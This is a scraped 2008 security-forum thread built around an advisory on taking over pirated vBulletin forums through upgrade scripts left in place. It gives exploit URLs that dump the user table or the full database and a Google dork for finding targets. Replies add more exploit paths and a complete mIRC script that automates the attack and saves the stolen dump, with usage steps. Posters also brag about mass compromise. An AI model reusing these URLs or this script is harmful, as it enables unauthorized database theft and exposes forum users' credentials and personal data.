Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: November 22, 2024 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 142 Members: 0 Total: 142 Full disclosure APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1 Local Privilege Escalations in needrestart APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2 APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1 APPLE-SA-11-19-2024-2 visionOS 2.1.1 APPLE-SA-11-19-2024-1 Safari 18.1.1 Reflected XSS - fronsetiav1.1 XXE OOB - fronsetiav1.1 St. Poelten UAS | Path Traversal in Korenix JetPort 5601 St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS) SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879) Security issue in the TX Text Control .NET Server for ASP.NET. SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater Unsafe eval() in TestRail CLI IT Security and Insecurity Portal www.waraxe.us Forum Index -> vBulletin Board -> [waraxe-2008-SA#067] - 0wning nulled vBulletin forums :) View previous topic :: View next topic [waraxe-2008-SA#067] - 0wning nulled vBulletin forums :) Posted: Mon Oct 06, 2008 4:19 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu [waraxe-2008-SA#067] - Easy way to 0wn nulled vBulletin installations =============================================================================== Author: Janek Vind "waraxe" Date: 06. October 2008 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-67.html Target software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ vBulletin 3.x pirated ("nulled") versions can be found in use in many websites. Example GoogleDork: "Nulled by NiGHTNiNG" Vulnerabilities discovered =============================================================================== vBulletin official installation guide states: "You should delete the install.php and upgrade*.php files now as a security precaution." Still, there are lot's of vBulletin-based websites with accessible update scripts. Let's try this: http://********.com/install/upgrade_300.php "Please Enter Your Customer Number" --> no easy way in, seems safe :) Now - what about "nulled" (pirated) vBulletin installations? It's amazingly huge community of nulled vBulletin users on Internet. Nulling - it means, that licence validation is crippled and usually customer number checking is completely removed! So anyone can access upgrade scripts without any authentication! This is possible, if upgrade files are not deleted and there is no additional access limiting methods implemented (like ".htaccess"). Let's find some pirated vBulletin installation and try this same request: http://********.com/install/upgrade_300.php ----------------------------------------------------------------------------- Your vBulletin version does not appear to match with the version for which this script was created (version 3.0.0 Release Candidate 4). Please ensure that you are attempting to run the correct script. If you are sure this is the script you would like to run, click here. ----------------------------------------------------------------------------- Oops ... what now? Let's try this: http://********.com/install/upgrade_300.php?step=1 ----------------------------------------------------------------------------- Step 1) Fix Some Table Errors (Step 1 of 2) Database error in vBulletin 3.0.0: Invalid SQL: ALTER TABLE vb_user ADD birthday_search DATE NOT NULL DEFAULT '0000-00-00'; MySQL Error : Duplicate column name 'birthday_search' ----------------------------------------------------------------------------- Cool, now we know table prexix! What next? http://********.com/install/upgrade_300.php?step=2 ----------------------------------------------------------------------------- Step 2) Upgrade to vBulletin 3.0.0 Complete! * Updating Version Number to 3.0.0... done ----------------------------------------------------------------------------- And finally - how about users table dump? Try this: http://********.com/install/upgrade_301.php?step=backup&do=sqltable&table=vb_user Or maybe full database dump? Why not, here it is: http://********.com/install/upgrade_301.php?step=backup&do=sqltable ----------------------------------------------------------------------------- Opening vb_user.sql --> download prompt ----------------------------------------------------------------------------- Mission complete! Pirates pwned :) How to fix: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Buy legal vBulletin licence. Or at least delete install directory. Greetings: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, koko, str0ke and anyone else who know me! Greetings to Raido Kerna. Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Homepage: http://www.janekvind.com/ Waraxe forum: http://www.waraxe.us/forums.html ---------------------------------- [ EOF ] --------------------------------- Posted: Mon Oct 06, 2008 5:37 pm pexli Valuable expert Joined: May 24, 2007 Posts: 665 Location: Bulgaria Well well.Waraxe this is very very old bug in old version's of vBulletin.This will work in 1% of all nulled version's.Why.Becase in most cases "install" dir is renamed or delete.Second.To do upgrade of the system you need one particular file ./install/init.php but this file is or renamed or deleted(if you follow the tip's when you completing installing vBulletin on your server.Something like "Please delete install.php and init.php otherwise you can't enter in admincp"). Original bug discover by "I don't know by who")) ./install/finalupgrade.php?step=/%20db*/%20backup*/%20 ./install/upgrade1.php?step=backup Posted: Mon Oct 06, 2008 5:50 pm pexli Valuable expert Joined: May 24, 2007 Posts: 665 Location: Bulgaria ОК дружише не падай духом.2% if you find file in 'forum' dir called validator.php.Nulled team's put this file inside in dir 'upload' to validate they nulled version's.If you find this file you can see all dir's and files in 'forum' directory.After that.:)Be inventive. Posted: Mon Oct 06, 2008 5:53 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Fact is that right now there are hundreds or thousands nulled vb-s waiting for exploiter. I did some digging and google gave me nulled target url-s. > 50% were affected There are lot's of mitigating factors, but my method will work almost with any nulled vb with undeleted update scripts. And i saw really big forums with >10 000 users and still exploitable. So how that's possible, if admin can't reach ACP before deleting crucial files? Anyway, i don't care, how old this knowledge is. As far as there are SO MANY exploitable targets, my advisory can be useful. Posted: Mon Oct 06, 2008 6:03 pm pexli Valuable expert Joined: May 24, 2007 Posts: 665 Location: Bulgaria waraxe wrote: Fact is that right now there are hundreds or thousands nulled vb-s waiting for exploiter. I did some digging and google gave me nulled target url-s. > 50% were affected There are lot's of mitigating factors, but my method will work almost with any nulled vb with undeleted update scripts. And i saw really big forums with >10 000 users and still exploitable. So how that's possible, if admin can't reach ACP before deleting crucial files? Anyway, i don't care, how old this knowledge is. As far as there are SO MANY exploitable targets, my advisory can be useful. Well if admin's are stupid:)Nobody delete's upgrading files.Try to install some new version's of vBulletin on your server or somewhere alse and you see after last step this shitt. Можно поиметь 50% но от етого толку немааа дружище.Те которъе надо брать такую хуйню не оставят,а кода она стояла из за етого бага я их брал пачками.Потом какойто придурок запостил етот баг (не помню может год или два назад) девелопентъй прикръли етот баг именно файлом init.php.Правда ето не относится к нулед версиям.Успехов дружище. P.S.Пожалста поменяй мой ник на pexli. Thank you. Regards pexli _________________ If you can´t hack some server then you know are admin is real Posted: Mon Oct 13, 2008 6:13 pm elc Beginner Joined: Oct 13, 2008 Posts: 1 vB 3.6.8 by "install/upgrade_300.php" (working only this) have Quote: Warning: require_once(./install/init.php) [function.require-once]: failed to open stream: No such file or directory in /data/site/public_html/forum/install/upgradecore.php on line 37 Fatal error: require_once() [function.require]: Failed opening required './install/init.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /data/site/public_html/forum/install/upgradecore.php on line 37 Anything can do? Posted: Mon Oct 13, 2008 6:37 pm pexli Valuable expert Joined: May 24, 2007 Posts: 665 Location: Bulgaria File init.php deleted or renamed.No. Posted: Fri Oct 17, 2008 9:04 pm Miyako Active user Joined: Jan 28, 2008 Posts: 25 Maybe this is stupid, but still .... Code: alias vbnull { if ($1 == -?) { echo -a Command: /VBNULL URL -D SUBDIR -P PORT -T TABLE -H echo -a -D : Specify a subdirection echo -a -P : Specify a port (standard = 80) echo -a -H : HTTP/1.1 used echo -a -T : Specify a table (no table = whole SQL-table) echo -a Ex. /VBNULL waraxe.us -D /forums/ -H -T user echo -a Original: 12http://www.waraxe.us/advisory-67.html return } if (!$1) { echo -a ERROR: /VBNULL -? | return } if ($2 != -H) && ($2) && (!$3) { echo -a ERROR: /VBNULL -? | return } var %a = $+($rand(a,z),$rand(a,z),$rand(a,z)) set %flags_ [ $+ [ %a ] ] $1- sockopen $+(vbnull_,%a) $1 $iif($findtok($1-,-P,1,32),$gettok($1-,$calc($v1 + 1),32),80) sockmark $+(vbnull_,%a) 1 echo -a 2Connecting to server... return } on *:SOCKOPEN:vbnull_*: { if ($sockerr) { echo -a 4Connection failed. Try: /VBNULL -? unset %flags_ [ $+ [ $gettok($sockname,2,$asc(_)) ] ] sockclose $sockname return } if ($sock($sockname).mark == 1) { echo -a 2Connected. Sending headers... var %b = %flags_ [ $+ [ $gettok($sockname,2,$asc(_)) ] ] sockwrite -n $sockname POST $+($iif($findtok(%b,-D,1,32),$gettok(%b,$calc($v1 + 1),32),/),install/upgrade_300.php) $iif($findtok(%b,-H,1,32),HTTP/1.1,$null) if ($findtok(%b,-H,1,32)) { sockwrite -n $sockname Host: $gettok(%b,1,32) } sockwrite -n $sockname $crlf return } if ($sock($sockname).mark == 3) { var %b = %flags_ [ $+ [ $gettok($sockname,2,$asc(_)) ] ] sockwrite -n $sockname POST $+($iif($findtok(%b,-D,1,32),$gettok(%b,$calc($v1 + 1),32),/),install/upgrade_300.php?step=1) $iif($findtok(%b,-H,1,32),HTTP/1.1,$null) if ($findtok(%b,-H,1,32)) { sockwrite -n $sockname Host: $gettok(%b,1,32) } sockwrite -n $sockname $crlf return } if ($sock($sockname).mark == 4) { var %b = %flags_ [ $+ [ $gettok($sockname,2,$asc(_)) ] ] sockwrite -n $sockname POST $+($iif($findtok(%b,-D,1,32),$gettok(%b,$calc($v1 + 1),32),/),install/upgrade_300.php?step=2) $iif($findtok(%b,-H,1,32),HTTP/1.1,$null) if ($findtok(%b,-H,1,32)) { sockwrite -n $sockname Host: $gettok(%b,1,32) } sockwrite -n $sockname $crlf return } if ($sock($sockname).mark == 5) { var %b = %flags_ [ $+ [ $gettok($sockname,2,$asc(_)) ] ] sockwrite -n $sockname POST $+($iif($findtok(%b,-D,1,32),$gettok(%b,$calc($v1 + 1),32),/),install/upgrade_301.php?step=backup&do=sqltable,$iif($findtok(%b,-T,1,32),$+(&table=,$gettok(%b,$calc($v1 + 1),32)),$null)) $iif($findtok(%b,-H,1,32),HTTP/1.1,$null) if ($findtok(%b,-H,1,32)) { sockwrite -n $sockname Host: $gettok(%b,1,32) } sockwrite -n $sockname $crlf return } } on *:SOCKREAD:vbnull_*: { if ($sockerr) { echo -a 4Connection failed. Try: /VBNULL -? unset %flags_ [ $+ [ $gettok($sockname,2,$asc(_)) ] ] sockclose $sockname return } if ($sock($sockname).mark == 1) { sockmark $sockname 2 echo -a 2Headers sent. Looking for nulled version... } var %a = $rand(1000,9999) sockread %sock_ [ $+ [ %a ] ] var %b = %flags_ [ $+ [ $gettok($sockname,2,$asc(_)) ] ] if ($sock($sockname).mark == 2) { if (<a href="upgrade_300.php?step=1"> isin %sock_ [ $+ [ %a ] ]) { echo -a 2Server is using nulled vBulletin. Executing step 1... var %c = $gettok($sockname,2,$asc(_)) sockclose $sockname sockopen $+(vbnull_,%c) $gettok(%b,1,32) $iif($findtok(%b,-P,1,32),$gettok(%b,$calc($v1 + 1),32),80) sockmark $+(vbnull_,%c) 3 unset %sock_ [ $+ [ %a ] ] return } if (</html> isin %sock_ [ $+ [ %a ] ]) { echo -a 4Server is using a legal vBulletin. unset %flags_ [ $+ [ $gettok($sockname,2,$asc(_)) ] ] unset %sock_ [ $+ [ %a ] ] sockclose $sockname return } } if ($sock($sockname).mark == 3) { if (Fix Some Table Errors isin %sock_ [ $+ [ %a ] ]) { echo -a 2Step 1 finished. Executing step 2... var %c = $gettok($sockname,2,$asc(_)) sockclose $sockname sockopen $+(vbnull_,%c) $gettok(%b,1,32) $iif($findtok(%b,-P,1,32),$gettok(%b,$calc($v1 + 1),32),80) sockmark $+(vbnull_,%c) 4 unset %sock_ [ $+ [ %a ] ] return } if (</html isin %sock_ [ $+ [ %a ] ]) { echo -a 4Unknown error. unset %flags_ [ $+ [ $gettok($sockname,2,$asc(_)) ] ] unset %sock_ [ $+ [ %a ] ] sockclose $sockname return } } if ($sock($sockname).mark == 4) { if (Upgrade to vBulletin 3.0.0 Complete isin %sock_ [ $+ [ %a ] ]) { echo -a 2Step 2 finished. Downloading SQL-database... var %c = $gettok($sockname,2,$asc(_)) sockclose $sockname sockopen $+(vbnull_,%c) $gettok(%b,1,32) $iif($findtok(%b,-P,1,32),$gettok(%b,$calc($v1 + 1),32),80) sockmark $+(vbnull_,%c) 5 unset %sock_ [ $+ [ %a ] ] return } if (</html isin %sock_ [ $+ [ %a ] ]) { echo -a 4Unknown error. unset %flags_ [ $+ [ $gettok($sockname,2,$asc(_)) ] ] unset %sock_ [ $+ [ %a ] ] sockclose $sockname return } } if ($sock($sockname).mark == 5) { write $+($gettok($sockname,2,$asc(_)),.txt) %sock_ [ $+ [ %a ] ] } unset %sock_ [ $+ [ %a ] ] return } on *:SOCKCLOSE:vbnull_*: { if ($sock($sockname).mark == 5) { echo -a 3Downloading complete. unset %flags_ [ $+ [ $gettok($sockname,2,$asc(_)) ] ] run $+($gettok($sockname,2,$asc(_)),.txt) return } } This is a snippet that can be pasted in mIRC's remote. Ex.: /vbnull blaat.com -D /forums/ -T user -H the "-T user"-flag is the table u want to save, if u don't specify any table, the whole SQL-database will be downloaded (this could take some time). The "-H"-flag should always be there (it tells the remote u want to use HTTP/1.1). Dunno if there r still bugs in the snippet. I did test it, but only on 3 sites. (it worked on all 3). Posted: Fri Oct 17, 2008 10:23 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Nice work ???? Posted: Mon Oct 20, 2008 9:15 am peterbacsi Beginner Joined: Oct 14, 2008 Posts: 2 how i can use this in mirc's remote????? Where i can find the remote in mirc and how i can use this script???? Please write manual step by step... Thanks! Re: ???? Posted: Mon Oct 20, 2008 4:35 pm Miyako Active user Joined: Jan 28, 2008 Posts: 25 peterbacsi wrote: how i can use this in mirc's remote????? Where i can find the remote in mirc and how i can use this script???? Please write manual step by step... Thanks! 1) Select code 2) Press: ctrl + C 3) DL mIRC 4) Press: Alt + R 5) Press: ctrl + V 6) Click: Ok 7) Typ: /vbnull -? Hard... not rly? ;o Cant figure this one out Posted: Mon Nov 03, 2008 11:30 pm capt Advanced user Joined: Nov 04, 2008 Posts: 232 Code: vBulletin Database Backup System Backups must be run prior to the upgrade, if the upgrade is complete please use the Admin Control Panel. For a foolproof backup, login to your server via Telnet or SSH and use the mysqldump command on the command line. Im getting this and the person does have init.php Anyway of fixing this problem? Im trying this Code: http://**********.com/forums/install/upgrade_302.php?step=backup&do=sqltable&table=vb_user i have tried the upgrade_300.php as well. Still same problem. btw forum version = 3.7.3 Posted: Wed Nov 05, 2008 6:10 am rahat Regular user Joined: Jul 24, 2008 Posts: 20 yeah, getting the same results on version 3.7.2 does anyone have solution? Posted: Thu Jan 15, 2009 6:58 pm delta Advanced user Joined: Jan 11, 2009 Posts: 60 Same here =/ The fact is that this don't work or only work in very very very² old versions. [waraxe-2008-SA#067] - 0wning nulled vBulletin forums :) www.waraxe.us Forum Index -> vBulletin Board You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 1 of 1 All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.054 Seconds